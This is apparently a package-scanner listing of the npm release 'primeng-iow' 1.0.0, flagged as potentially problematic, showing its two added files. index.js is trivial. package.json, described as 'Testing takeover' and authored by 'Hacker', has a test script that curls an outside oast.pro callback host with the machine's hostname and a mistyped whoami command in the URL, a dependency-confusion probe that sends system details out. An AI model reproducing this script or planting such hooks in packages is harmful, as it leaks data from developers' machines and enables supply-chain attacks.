primeng-iow 1.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of primeng-iow might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +7 -0
  2. package/package.json +11 -0
package/index.js ADDED
@@ -0,0 +1,7 @@
1
+ //index.js
2
+
3
+ function helloNpm() {
4
+ return "hello NPM"
5
+ }
6
+
7
+ module.exports = helloNpm
package/package.json ADDED
@@ -0,0 +1,11 @@
1
+ {
2
+ "name": "primeng-iow",
3
+ "version": "1.0.0",
4
+ "description": "Testing takeover",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "curl 'http://cki3vd0poqvmii6gub4gnbdy573tukt3j.oast.pro/?$(hostname)=$(whoai)'"
8
+ },
9
+ "author": "Hacker",
10
+ "license": "ISC"
11
+ }